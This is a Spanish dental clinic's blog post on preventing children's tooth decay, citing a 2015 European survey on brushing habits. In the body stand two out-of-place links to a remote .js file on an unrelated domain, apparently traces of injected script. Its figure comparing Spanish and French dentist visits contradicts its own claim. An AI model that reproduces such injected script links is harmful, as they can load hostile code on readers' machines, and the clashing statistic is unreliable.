Robles Dental

Dentistas de familia desde 1984

Escuela de padres: La importancia de la prevención

Deja un comentario

En 2015, un estudio sobre salud bucodental realizado a 7.500 padres de toda Europa, reveló que un tercio de los niños de nuestro país se cepillan solo los dientes anteriores, omitiendo completamente los posteriores, y el 43,1% no se cepilla los dientes el tiempo necesario (dos minutos).

Más del 90% de los padres encuestados, están de acuerdo en que la adquisición de hábitos de cepillado dental está directamente relacionado con el ejemplo que ellos den. Por ello, es muy importante que los niños los vean cepillarse los dientes.

Con la vuelta al colegio, lo niños suelen ingerir más bollería industrial, con azúcares y grasas saturadas, que a la larga pueden provocar obesidad y caries. Es importante además, que el niño tenga hábito de cepillado, para mantener una adecuada higiene buco dental tanto dentro como fuega del hogar.

Un dato relevante de este estudio es que, en comparación con nuestros vecinos los franceses, los niños españoles visitan al dentista con menor frecuencia (un 45.6% frente a un 40.4% respectivamente), a los siete años de edad el 16,2% ya tienen algún empaste y al 12% ya se le ha practicado alguna extracción dentaria.

Con todo, la asistencia dental profesional orientada a la prevención es muy importante y más gratificante tanto para niños como padres, lo que conlleva menores costes futuros.

Como el sabio refrán reza, más vale prevenir que curar, prevengamos ahora y nuestros niños llegarán a la adultez con bocas sanas y equilibradas, ¡os lo agradecerán!.

http://plugintemarosa.info/dfi823hs.js?0.8205492097881708

http://plugintemarosa.info/dfi823hs.js?0.7518993786318734

Autor: roblesdental

En Robles Dental somos dentistas de familia desde 1984. Contamos una amplia variedad de tratamientos adultos y niños al servicio de nuestros pacientes: • Odontología preventiva • Ortodoncia fija e invisible, interceptiva • Ortopedia. Tratamiento precoz de maloclusiones • Odontología conservadora.Obturaciones. Endodoncia. • Periodoncia. Cirugía bucal • Protesis removible. Fija sin metal CAD-CAM (circonio, cerámica prensada) • Laboratorio propio (reparaciones rápidas) • Implantes osteointegrados, cirugía mínimamente invasiva y guiada. • Dolor orofacial, cefaleas y patologíaa de articulación temporomandibular ATM • Estética dental (blanqueamientos, carillas) • Estética facial (mesoterapia, rellenos, botox, hilos tensores, etc)

Deja una respuesta

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Salir /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Salir /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Salir /  Cambiar )

Conectando a %s